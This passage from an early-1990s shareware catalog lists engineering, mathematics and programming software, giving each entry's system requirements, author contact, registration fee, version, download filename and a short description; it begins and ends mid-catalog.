disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Industrial + Engineers Tool Box. It collects data to show right & left hand + motions used in performing a task (does not use Therbligs), + then it initializes PC-KEY DRAW to use an ALPS Software custom + process symbol library to draw an operator chart (which can + + Chapter 10, "Engineering" 244 + + + + also be used as task description on the job). Proper evaluation + of the I E Tool Box requires all 20 programs. + + Product: Operator Process(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + A module in the Work Measurement Section of the Personal + Consultant. It collects data to show right & left hand motions + used in performing a task (does not use Therbligs), then it + initializes Draft Choice to use an ALPS Software custom process + symbol library to draw an operator chart (which can also be + used as a task description on the job). Proper evaluation of + the Personal Consultant requires all 18 programs. + + Product: Overhead Cost + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 57k + Description: + A module within the Facilities Management Section of the + Industrial Engineers Tool Box. It pulls data developed in FES + & CLN into overhead cost data by operation. It also allows data + for utilities, facility cost, taxes, insurance, etc. to be + prorated by operation. It doesn't attempt to develop data + accurate to the penny, but rather develops trends to point out + possible areas of concern in overhead cost management. Proper + of the I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 245 + + + + Product: Overhead Cost(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + amil support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 57k + Description: + A module within the Facilities Management Section of the + Personal Consultant. It pulls data developed in FES & CLN into + overhead cost data by operation. It also allows data for + utilities, facility cost, taxes, insurance, etc. to be prorated + by operation. It doesn't attempt to develop data accurate to + the penny, but rather develops trends to point out possible + areas of concern in overhead cost management. Proper + evaluation of the Personal Consultant requires all 18 programs. + + Product: Space Relationship + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPS3.EXE (multiple files) on BBSs; ALPS3.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 43k + Description: + The final module in the Facilities Management Section of the + Industrial Engineers Tool Box. It puts combined flow & sevice + affinities from Layout Planning in rank order in a table to be + used for CAD drawings of block layouts. It also provides the + length of the side of a square of the operation square footage, + as a starting place for the analyst to run from a square to + shape of best fit. Proper evaluation of the I E Tool Box + requires all 20 programs. + + Chapter 10, "Engineering" 246 + + + + Product: Space Relationship(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $15.00 + Version: 3.0 (11-15-91) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: ALPPC3.EXE (multiple files) on BBSs; ALPPC3.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 43k + Description: + The final module in the Facilities Management Section of the + Personal Consultant. It puts combined flow and service + affinities from Layout Planning in rank order in a table to be + used for CAD drawings of block layouts. It also provides the + length of the side of a square of the operation square footage, + as a starting place for the analyst to run from a square to + shape of best fit. Proper evaluation of the Personal + Consultant requires all 18 programs. + + Product: Statistical + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + Rounds out the Industrial Engineers Tool Box, as each of the + study areas require statistical support. It sets up random + sampling schedules. Universal standard mean is used to avoid + bias. The program allows analysis of normal distribution, 't' + & chi square. For those who can't let go of tables, help + screens provide 's','t'& chi suare values. The program can + also perform regression & correlation analysis. Proper + evaluation of the I E Tool Box requires all 20 programs. + + Chapter 10, "Engineering" 247 + + + + Product: Statistical(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $25.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC3.EXE (multiple files) on BBSs; ALPPC3.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 48k + Description: + Rounds out the Personal Consultant, as each of the study areas + require statistical support. It sets up random sampling + schedules. Universal standard mean is used to avoid bias. The + program allows analysis of normal distribution, `t' & chi + square. For those who can't let go of tables, help screens + provide `s', `t' & chi square values. The program can also + perform regression & correlation analysis. Proper evaluation + of the Personal Consultant requires all 18 programs. + + Product: TRIG-IT & GEO-DIM + Needs: IBM PC, DOS 2.1 or better. + Author: Northland Multisoft, 818-963-6355 + Registration: $10.00 + Version: 1.01 (06-21-91) + User benefits: Six months of support and latest version on disk. + Look for: TI&GD1.ZIP on BBSs. + Download size: 120k + Description: + TRIG-IT Give two known values of a right angle triangle + and Trig-it reports the remaining values. + Reports the angle in decmial and in degrees + minutes seconds and tenths of seconds. Displays + the triangle on screen so that you can see how + it looks. + GEO-DIM Give one known value of a geometric shape and + Geo-dim reports the remaining values. Displays + the geometric shape on screen also. + + Product: Value Engineering + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, IE + TOOL BOX. + Author: ALPS Software, 719-269-1117 + Registration: $20.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS2.EXE (multiple files) on BBSs; ALPS2.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 72k + Description: + A part of the Industrial Engineers Tool Box, while basically + here for the trained analyst, can be used by one who follows + the menus to select the VE team, develop functional activity + simplifications, & compare alternatives. The trained analyst + + Chapter 10, "Engineering" 248 + + + + can use VE & OVAL (Organization Value Analysis Logic) to + analyze the office environment for possible down sizing. + Proper evaluation of the I E Tool Box requires all 20 programs. + + Product: Value Engineering(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, Draft + Choice, the Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $20.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC2.EXE (multiple files) on BBSs; ALPPC2.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 72k + Description: + A part of the Personal Consultant, while basically here for the + trained analyst, can be used by one who follows the menu to + select the VE team, develop functional activity + simplifications, & compare alternatives. The trained analyst + can VE & OVAL (Organization Value Analysis Logic) to analyze + the office environment for possible down sizing. Proper + evaluation of the Personal Consultant requires all 18 programs. + + Product: Volume,Hours & Productivity + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor; IE + Tool Box. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPS1.EXE (multiple files) on BBSs; ALPS1.EXE in IBMAPP + forum LIB 13 (multiple files) on CompuServe. + Download size: 77k + Description: + Develops present & historical data for use in analyzing work + place performance by operation & tour. The program allows + inclusion of fringe hours for development of staffing needs + based on either a level daily average of year to date hours & + volume, or an adjusted daily average of ytd hours & volume. + The adjustment can be for either volume increase or desired % + of productivity increase. Proper evaluation of the IE Tool Box + requires all 20 programs. + + Chapter 10, "Engineering" 249 + + + + Product: Volume,Hours & Productivity(PC) + Needs: IBM PC, DOS 2.0 or better. Hard disk, CGA monitor, the + Personal Consultant. + Author: ALPS Software, 719-269-1117 + Registration: $40.00 + Version: 3.0 (11-15-91) + User benefits: Master disks, phone/CompuServe/mail support. + Look for: ALPPC1.EXE (multiple files) on BBSs; ALPPC1.EXE in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 77k + Description: + Develops present & historical data for use in analyzing work + place performance by operation & tour. The program allows + inclusion of fringe hours for development of staffing needs + based on either a level daily average of year to date hours & + volume, or an adjusted daily average of ytd hours & volume. + The adjustment can be for either volume increase or desired % + of productivity increase. Proper evaluation of the Personal + Consultant requires all 18 programs. + + + 10.2 Electrical engineering + + Product: Easy Project + Project Management Software. See full description on page 199. + + Product: ELECTRON + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Author: H&P Software, 719-561-0810 + Registration: $10.00 + Version: 2.5 (04-23-91) + User benefits: Latest program version. No documentation provided + due to the type of program. + Look for: ELECTRON (multiple files) on BBSs. + Download size: 166k + Description: + 555 timer design / resistive attenuator design / ammeter & + voltmeter design / dB gain or loss / DC Ohms law / parallel + resistor calcs / resistor color coding / constant voltage loud + speaker design / characteristic impedance of coax / fractional + HP motor graphics / 3-phase transformer graphics / calculate + inductance or # of turns for coils / true power calculations / + find required pump HP / wire size tables / maximum wires in + conduit / motor current tables / RPM vs frequence / resonant + frequency. + + Chapter 10, "Engineering" 250 + + + + Product: PC-ECAP + Needs: IBM PC, DOS 2.0 or better. 384k RAM. IBM, Epson, or HP + LaserJet printer. + Author: Circuit Systems, 609-875-5433 + Registration: $79.00 + Version: 2.01 (02-03-92) + User benefits: Printed manual, master disks, mail/phone support. + Look for: PC-ECAP2.ZIP on BBSs (call 609-582-4753 to download it + at no charge). + Download size: 145k + Description: + This easy to use AC circuit analysis program will calculate + magnitude, phase, group delay, impedance, VSWR, and return loss + for your circuits. Completely menu driven. Can analyze + circuits with up to 40 nodes. Built in full screen editor with + "Help". Full screen file selector. Plots high res graphs on- + screen or on IBM/Epson 9 or 24 pin or HP LaserJet printers. + Supports all video adapters. Even makes bipolar transistor + models. Will utilize a math coprocessor if available. + + + 10.3 Civil engineering + + Product: DICOGO + Needs: IBM PC, DOS 3.0 or better. + Author: DI Management Corporation, 513-831-4122 + Registration: $199.00 + Version: 3.0 (09-30-91) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; DICOG3.EXE in AUTODESK + forum LIB 13 on CompuServe. + Download size: 112k + Description: + Coordinate geometry program for use with CAD systems or on a + stand-alone basis. Can be run from ACAD, and will create a DXF + file to import into a drawing. Features include batch command + input, command line editing, automatic recording of keyboard + commands into a command file, and cross-referenced help. Will + annotate lines arcs, and areas. A demonstration batch file is + included. Lisp utils included to create command or point files + from a drawing. + + Product: PC-STRAN(tm) [***] + 1-,2-,or 3-dimensional STRuctural ANalysis. See full + description on page 250. + + Product: PCBRIDGE(tm) [***] + continuous beam structural analysis (bridges). See full + description on page 251. + + Chapter 10, "Engineering" 251 + + + + 10.4 Structural analysis + + Product: PC-STRAN(tm) [***] + Needs: IBM PC, DOS 2.1 or better. 448k RAM, CGA or Hercules + monitor. + Author: Joe Murphy, 608-274-1946 + Registration: $50.00 + Version: 4.31 (04-01-91) + User benefits: Master disks, upgrade discounts. + Look for: STRAN431.ZIP on BBSs. + Download size: 369k + Description: + Performs a 1-,2-, or 3-dimensional structural analysis. Shows + graphically the structure mesh, deformed structure, load, + shear, moment, rotation and deflection member diagrams on + graphics monitors. Powerful features include the ability to + handle semi-rigid connections, zoom and rotate viewing angle, + calculate member self-weight, extraploation of trapezoid member + loads on member length or projected lengths (even on sloping + members). Uses an 80x87 if present. Example input files. + + Product: PCBRIDGE(tm) [***] + Needs: IBM PC, DOS 2.1 or better. 256k RAM, CGA or Hercules + monitor. + Author: Joe Murphy, 608-274-1946 + Registration: $30.00 + Version: 2.60 (01-01-90) + User benefits: Master disks, upgrade discounts. + Look for: BRDG260.ZIP on BBSs. + Download size: 88k + Description: + Analyses the forces on a continuous beam over simple supports. + Allows for differing stiffness and dead load between spans. + Gives maximum moment, shear and deflection diagrams (and + tabular output) using the 3-moment method. Also gives + ENVELOPES for moving loads. Uses a 80x87 if present. Option + for AASHTO or user-defined impact factor. Has 8 common vehicles + and 10 user-defined vehicles. + + Chapter 10, "Engineering" 252 + + + + 10.5 Numerical control + + Product: CNC-Transedit + Needs: IBM PC, DOS 3.0 or better. 384k RAM, hard disk, CGA + monitor, RS-232 serial port. CNC machine or PTR machine able + to input/output ASCII or ISO code. Cable described in the + READ-CNC.DOC file. + Author: Northland Multisoft, 818-963-6355 + Registration: $28.00 + Version: 1.1 (12-12-91) + User benefits: Latest version on disk and six months of support. + Look for: CNCTE1.ZIP on BBSs. + Download size: 230k + Description: + A CNC transfer program that stores and identifies up to 1000 + program files. Edit program files with cut and paste and search + functions with mouse support. Send and receive program files + between computer and CNC machine or PTR machine. Print programs + and program list with identification. Copy file(s) for backup. + Plus TRIG-IT and GEO-DIM and more ... + + + 10.6 Engineering utilities + + Product: METRIC-X + Gov't Reviewed Metric-English Conversion Util. See full + description on page 211. + + + 10.7 Software tools + + 10.7.1 For other + + Product: HelpPC Quick Reference Utility + PC Programmer's reference utility. See full description on + page 259. + + Product: NPS - Nominal Pipe Size + Needs: IBM PC, DOS 3.0 or better. + Author: Herne Data Systems Ltd, 519-366-2732 + Registration: $29.95 + Version: e1.2 (02-08-92) + User benefits: Technical support and updates for 60 days. + Look for: availability unknown on BBSs; PIPE12.ZIP in IBMAPP + forum LIB 13 on CompuServe. + Download size: 97k + Description: + NPS displays dimensional, weight and flow capacity data for a + wide range of piping materials and sizes. (over 2000 sizes of + standard and specialty pipes in over 25 different materials). + Easy to use menu driven format with user selectable dimensional + units (US, Imperial or metric) and display colors. A must for + all piping engineers and students. + + Chapter 10, "Engineering" 253 + + + + 10.8 Other + + Product: NPS - Nominal Pipe Size + Displays data for different sizes of pipe. See full + description on page 252. + + Product: ORGANIZE! Professional Books [***] + Cataloging system for professional books. See full description + on page 204. + + Product: Plot-Line + Needs: IBM PC, DOS 2.1 or better. HP compatible RS-232 digital + plotter. + Author: PlotSoft Solutions, 519-925-5468 + Registration: $25.00 + Version: 1.7 (01-04-91) + User benefits: Unlimited phone/CompuServe/mail support. + Look for: availability unknown on BBSs; P-LINE.EXE in ADESK forum + LIB 10 on CompuServe. + Download size: 40k + Description: + A command line TSR that can output Hewlett Packard (HP-GL) text + files created by other applications to HP or HP compatible + RS-232 plotters in the background. Can spool files matching a + common mask (ie *.plt) and plot them automatically in the + background while you continue to use your computer for other + work in the foreground. Works with all HP plotters. Uses the + TesSeRact Library for Ram Resident Programs and requires 36K to + go resident. + + Chapter 11, "Mathematics" 254 + + + + + + Chapter 11 + Mathematics + + + 11.1 General math + + Product: Dad's Choice [***] + Children's math and graphics program. See full description on + page 300. + + Product: MathAttack + Needs: IBM PC, DOS 2.1 or better. + Author: Northland Multisoft, 818-963-6355 + Registration: $7.00 + Version: 1.0 (12-22-91) + User benefits: Six months of support, a disk and a manual. + Look for: MAAT1.ZIP on BBSs. + Download size: 80k + Description: + Practice your math skills and if you get the answer correct it + will play a little tune. Choice of single or double digit + numbers in addition, subtraction, multiplication, division. + + Product: Mercury + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Real Software, 408-476-3550 + Registration: $49.00 + Version: 2.06 (07-01-91) + User benefits: Latest disk, printed manual, support. + Look for: MERCURYZ.EXE on BBSs (call 408-476-1055 to download it + at no charge); MRCRY2.ZIP in IBMAPP forum LIB 13 (multiple + files) on CompuServe; MERCURY2.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 300k + Description: + Complete program for equation solving and graphics on the PC. + Similar to Borland's Eureka, but with many improvements. + + Product: Mom's Math [***] + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: Motes Educational Software, 501-442-5652 + Registration: $10.00 + Version: 3.0 (03-03-92) + User benefits: Mail support. Shareware disks of other programs. + Look for: availability unknown on BBSs; MOMSMA.ZIP in IBMAPP + forum LIB 11 on CompuServe. + Download size: 65k + Description: + This math program is for children of all ages. It contains + arcade style math games and other modules for addition, + subtraction, multiplication, division, and pre-algebra. These + modules have multiple learning levels so your child will never + outgrow the program. + + Chapter 11, "Mathematics" 255 + + + + Product: TRIG-IT & GEO-DIM + Figures trigonometric & geometric dimentions. See full + description on page 247. + + + 11.2 Mandelbrot + + Product: Recursive Realm + Needs: IBM PC, DOS 2.0 or better. EGA monitor. Mouse + recommended. + Author: Austin Software Design, 303-242-7606 + Registration: $20.00 + Version: 3.0 (09-01-91) + User benefits: Master disks, bonus pictures, bonus utilities, + upgrade discounts. + Look for: RR*.ZIP (multiple files) on BBSs; RR*.EXE in IBMNEW + forum LIB 5 (multiple files) on CompuServe. + Download size: 320k + Description: + This fractal exploration tool is designed with the user in + mind. A mathematical education is not needed to explore its + stunning fractal images. Explore 22 equations including the + Mandelbrot set, Julia sets, Newton's Method, or Models of + Magnetism. Features mouse support, PCX format, 3-D, spheres, + jigsaw puzzles, and an easy-to-use menu with help available + everywhere. Integer-emulation and Mariani's algorithm make One + of the fastest fractal explorers available. + + + 11.3 Statistics + + Product: FDplot [***] + A quick scientific function/data & stat plot. See full + description on page 286. + + Product: KWIKSTAT + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: TexaSoft, 214-291-2115 + Registration: $49.00 + Version: 2.1 (05-24-91) + User benefits: Printed manual, discounts on new versions, + Kwikbits newsletter. + Look for: KS21-*.ZIP (multiple files) on BBSs; KS21-*.ZIP in + IBMAPP forum LIB 13 (multiple files) on CompuServe. + Download size: 600k + Description: + A menu driven statistical data analysis system designed by + professional statisticans. It reads and creates dBASE type + files and allows data entry from keyboard as ASCII files. + Features include simple descriptive statistics, graphs, t- + tests, analysis of variance, crosstabulations, survival + analysis and more. Supports missing values. PC Week called it + the "Numbers Game Winner." Thousands of users in the U.S. and + over 30 countries. + + Chapter 11, "Mathematics" 256 + + + + Product: Lotto Challenger + Picks numbers to play and generates tickets. See full + description on page 335. + + Product: PathProj + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Version: 9103 (03-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXPATH.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 75k + Description: + Interactive CGA graphical display of the projection of + generalized ridge regression "shrinkage path" statistics + (either regression coefficients and the inferior direction or + else regressor coordinates) onto any 2-dimensional linear + subspace. Select your subspace using any pair of orthogonal + direction cosine vectors, then literally watch the inferior + direction change as you step along the ridge shrinkage path. A + bounce-bar menu helps you select RXridge output files for + importing to PathProj. + + Product: PCStat + Needs: IBM PC, DOS 2.0 or better. 640k RAM. Hard disk or 720k + floppy drive. + Author: PC Information Systems, 702-342-0376 + Registration: $45.00 + Version: 2.3 (08-01-91) + User benefits: Printed manual, support. + Look for: PCSTAT23.ZIP on BBSs (call 702-849-2207 to download it + at no charge); PCSTAT.ZIP in IBMAPP forum LIB 13 on CompuServe. + Download size: 305k + Description: + Superb new descriptive statistics report program for varible + data. Easy to use even for statistics or computer novices. + Lotus like user interface enhanced with pull-down menus. Sample + report. Context sensitive help. Accepts Lotus, ASCII, DIF and + prepared dBase data. Manual keying in of data also possible. + Professional reports are uncomplicated to comprehend and ideal + for many business and industry situations. + + Chapter 11, "Mathematics" 257 + + + + Product: RXridge + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Version: 9104 (04-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXRIDG.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 117k + Description: + Ridge Regression Computations/Graphics System: Performs all + calculations for classical, maximum likelihood methods of 2- + parameter generalized ridge regression. Handles exact + (numerical) singularities as well as statistically ill- + conditioned regression prolems. Pop-Up Window/Menus interface + with interactive, on-screen annotation of CGA graphics screens. + RXridge.EXE automatically writes detailed TRACE output to ASCII + files ready for import by RXtraces.EXE and PathProj.EXE. + + Product: RXtraces + Needs: IBM PC, DOS 2.0 or better. CGA monitor. + Author: softRX shareware + Registration: $25.00 + Version: 9103 (03-01-91) + User benefits: Newsletter; Answers to Mailed-In Questions on + Ridge Theory/Applications. + Look for: availability unknown on BBSs; RXTRAC.EXE in IBMAPP + forum LIB 13 on CompuServe. + Download size: 70k + Description: + Interactive CGA graphical displays of all 5 types of + generalized ridge regression TRACES (i.e. of regression + coefficients, scaled mean squared errors, excess eigenvalues, + inferior direction cosines, or the shrinkage pattern.) Ideal + for ridge training and/or self-paced learning applications + where students review RXridge outputs across a wide spectrum of + previously-computed numerical examples. A bounce-bar menu + helps you select RXridge.EXE output files for importing to + RXtraces.EXE. + + Product: SURVEY POWER + Needs: IBM PC, DOS 2.1 or better. 320k RAM. + Author: WISCO Computing, 715-423-8189 + Registration: $31.95 + Version: 1.00 (01-02-92) + User benefits: Latest version, telephone and BBS support. + Look for: SURVEYPW.ZIP on BBSs (call 715-435-3855 to download it + at no charge). + Download size: 94k + Description: + Create, analyze, and print out complete demographic and + correlation results to your surveys, opinion polls and tests. + Accepts single choice, multiple choice, rank order, and + + Chapter 11, "Mathematics" 258 + + + + cummulative total type questions. Useful in both business and + school environments. Results can be modified before printing. + + + 11.4 Mathematical utilities + + Product: METRIC-X + Gov't Reviewed Metric-English Conversion Util. See full + description on page 211. + + + 11.5 Other + + Product: FDplot [***] + A quick scientific function/data & stat plot. See full + description on page 286. + + Chapter 12, "Programming" 259 + + + + + + Chapter 12 + Programming + + + 12.1 CASE tools + + Product: TesSeRact Screen Designer + Code-Generator for TCXL. See full description on page 267. + + + 12.2 Desktop tools for programmers + + Product: ALLY + AutoLISP analyzer/Programer's workbench. See full description + on page 313. + + Product: Browse/2 + OS/2 file viewer for ASCII and hex data. See full description + on page 39. + + Product: FILE PATCH + File manipulation utility. See full description on page 33. + + Product: HelpPC Quick Reference Utility + Needs: IBM PC, DOS 2.0 or better. + Author: David Jurgens + Registration: $30.00 + Version: 2.10 (07-01-91) + User benefits: 1 Free Upgrade, 90 day product support. + Look for: availability unknown on BBSs; HELPPC.ZIP in IBMPRO + forum LIB 7 on CompuServe. + Download size: 300k + Description: + A quick reference utility for programmers wishing to spend less + time searching for hard to find technical data. It features a + hypertext system that can conveniently search for topics such + as the syntax of a C function or the cycle time of a 386 + instruction. The databases include a myriad of topics (over + 1300) from BIOS and DOS interrupts through hardware register + formats. All the information a PC programmer could need in one + convenient source. Includes both a TSR and command line + version. + + Product: pEDIT PLUS + The personal EDITor PLUS. See full description on page 118. + + Chapter 12, "Programming" 260 + + + + Product: Prgmr's Productivity Pack Lite + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $19.00 + Version: 1.01 (03-25-90) + User benefits: Current version on disk, Bonus Disk, free + technical support, 60 day money back guarantee, Free CompuServe + Introductory Membership, Discounts on other products and + publications. + Look for: PPLITE.ZIP on BBSs; PPLITE.ZIP in IBMPRO forum LIB 6 on + CompuServe. + Download size: 256k + Description: + Programmer's Calculator providing full shift, rotate, logical, + and mathematical operations on full 32-bit values, in decimal, + hexadecimal, octal and binary simultaneously. Pop-Up ASCII and + Color Attribute Chart. Keystroke Reference Center. Pop-Up DOS + Shell and more. Swapping memory-resident version keeps only 7K + bytes of normal DOS memory while resident. May also run in + stand-alone mode (not memory-resident). Fully customizable. + DESQview-aware. Received excellent magazine reviews! + + Product: Programmer's Productivity Pack + Needs: IBM PC, DOS 2.0 or better. + Author: Falk Data Systems, 915-584-7670 + Registration: $79.00 + Version: 2.61 (05-12-91) + User benefits: Bound printed manual, ASCII Poster Set, Bonus Disk + Set, 60 day money back guarantee, free technical support, Free + CompuServe Introductory Membership, Discounts on other products + and publications. + Look for: PPP26*.ZIP (multiple files) on BBSs; PPP26*.ZIP in + IBMPRO forum LIB 6 (multiple files) on CompuServe. + Download size: 404k + Description: + An integrated collection of tools for programmers. Programmer's + Calculator which works in decimal, hexadecimal, binary and + octal simultaneously. Operations include bit shifts and + rotates, AND, NOT, OR, XOR, and more. Full 32-bit values. Pop- + Up ASCII and Color Attribute Chart. Keystroke Reference Center. + Keystroke Recording and Playback. Lots more. Swapping version + keeps only 7K of DOS memory while resident. + + "Outstanding" "Highly recommended" + + -- PC World -- Dr. Dobb's Journal + + Product: WinBatch + Windows Batch Language. See full description on page 69. + + Product: WinEdit + Perfect ASCII editor for Windows 3.0. See full description on + page 120. + + Chapter 12, "Programming" 261 + + + + 12.3 Languages + + See also: Database applications, Software tools (page 149). + + 12.3.1 Assembler + + Product: HelpPC Quick Reference Utility + PC Programmer's reference utility. See full description on + page 259. + + Product: Programmer's SUPER-MAINT [***] + The "easier" make utility. See full description on page 272. + + 12.3.2 BASIC + + Product: Convert To Structured BASIC + Convert GW to Structured Basic for compiling. See full + description on page 276. + + Product: PBfmt + Needs: IBM PC, DOS 3.0 or better. + Author: Unique Software + Registration: $19.95 + Version: 1.99 (07-21-91) + User benefits: Reduced rate upgrades; notification of major + upgrades; tech support by Fax and/or CompuServe Mail. + Look for: PB-FMT on BBSs; PB-FMT.EXE in PCVENB forum LIB 12 on + CompuServe. + Download size: 84k + Description: + Formats Power Basic Source code the way you want it. + * works with or without line #'d source + * all structures handled and indented properly + * case choices of UPPER, lower, Capital, no change + * select case for labels, keywords, variables, sub/fn names + * fast formatting option + * makes mis-matched IF / END IF's easy to find + + Product: PBMouse + Needs: IBM PC, DOS 2.1 or better. PowerBASIC v2.10. + Author: Barry Erick, 717-675-3432 + Registration: $10.00 + Version: 1.0 (01-01-91) + User benefits: Source to the PBU file. + Look for: availability unknown on BBSs; PBMICE.EXE in PCVENB + forum LIB 12 on CompuServe. + Download size: 35k + Description: + More than just another Mouse Interface for PowerBASIC. This + utility includes: + * More than 12 text mouse cursors + * More than 25 graphics mice cursors + * Add your own mouse cursors! + * Tie the mouse to the system clock + + Chapter 12, "Programming" 262 + + + + * A tsr routine. + * 5 demos show off these features. + Full DOC file along with the Include and OBJ code file make up + this utility. + + Product: PBWindows + Needs: IBM PC, DOS 2.1 or better. PowerBASIC v2.10 (any sub + version). + Author: Barry Erick, 717-675-3432 + Registration: $25.00 + Version: 2.5 (09-01-91) + User benefits: Source code and printed manual. + Look for: availability unknown on BBSs; PBWNDO.ZIP in PCVENB + forum LIB 12 on CompuServe; PBWINDOW.ZIP in IBMPC RTC LIB 8 on + GEnie. + Download size: 110k + Description: + A wonderful windowing utility. Just include PBWINDOWS.INC in + your program and start creating all types of windows and menus. + Now supports MOUSE and EGA/VGA 43/50 line modes. + * Any size window + * Shadows, Transparent and solid + * Scrolling + * Moving + * 12 Title Zones + * Recoloring + * PopUp + * Restore original window + * Works with Mono systems + * Mouse Support + * EGA/VGA 43/50 line + * PBWTools Included for system information + + Product: Q4Tool + Needs: IBM PC, DOS 2.1 or better. QuickBASIC 4.x. + Author: CareWare, 916-477-6024 + Registration: $20.00 + Version: 1.5 (02-08-92) + User benefits: Phone/CompuServe/mail support. + Look for: availability unknown on BBSs; Q4T15.ZIP in IBMPRO forum + LIB 4 on CompuServe; Q4T15.ZIP in IBMPC RTC LIB 8 on GEnie. + Download size: 85k + Description: + An innovative collection of programming tools for QuickBASIC + 4.x. Features a comprehensive selection of mouse functions, a + unique windowing routine, fast screen save/restore routines, + fast single routine string writes, new pull down bar menu + routine, get/set equipment status routines, access to DOS + services and more. Contains nearly everything needed to create + fast, attractive, mouse driven applications. Demo with source + included. + + Chapter 12, "Programming" 263 + + + + Product: Simply Help! + EXE/TSR/QuickBASIC Hypertext Help systems. See full + description on page 278. + + Product: STARTREK the Computer Program + Teaches programming, using the Star trek game. See full + description on page 376. + + 12.3.3 C + + Product: CtrlcLib + Needs: IBM PC, DOS 3.0 or better. Microsoft C, Turbo-C, or + Turbo-C++ compiler. + Author: Trendtech Corporation, 201-694-8622 + Registration: $30.00 + Version: 1.0 (01-01-91) + User benefits: Full C Source Code, NO assembler; Use in your + products royalty-free; s,m,c,l model libraries. + Look for: CTRLC1.ZIP on BBSs; CTRLC1.ZIP in IBMPRO forum LIB 3 on + CompuServe. + Download size: 167k + Description: + A unique library of user-initiated interrupt management + functions for C programmers. Your software products can control + all types of user-initiated interrupts and program "breaks": + you can trap CTRL-C, CTRL-BREAK, CTRL-2, and ALT-3, eliminate + the insidious "^C" displayed on the screen; block the "pause" + keys, the prt-screen keys and others. Functions to trap system + reset; force a warm/cold reboot. More functions control + settings of all 'lock' keys: capslock, numlock, etc. + + Product: HelpPC Quick Reference Utility + PC Programmer's reference utility. See full description on + page 259. + + Product: KEYTREE UTILITIES + Needs: IBM PC, DOS 2.1 or better. C compiler. + Author: REWSE CONSULTANTS LIMITED + Registration: $50.00 + Version: 3.10 (08-01-91) + User benefits: Technical support by mail. + Look for: KEYTREE.ZIP on BBSs. + Download size: 300k + Description: + This set of library routines for C programmers create and + maintain randomly accessed files of variable length records. + The indexing algorithm requires only sufficient of the record + key to ensure uniqueness before reading a record (if you have + only one customer whose name starts with Z, you get the record + as soon as you type Z). Any number of files may be opened, and + each may have up to 10 multi-field keys. Many other features. + + Chapter 12, "Programming" 264 + + + + Product: LiteComm(tm) for 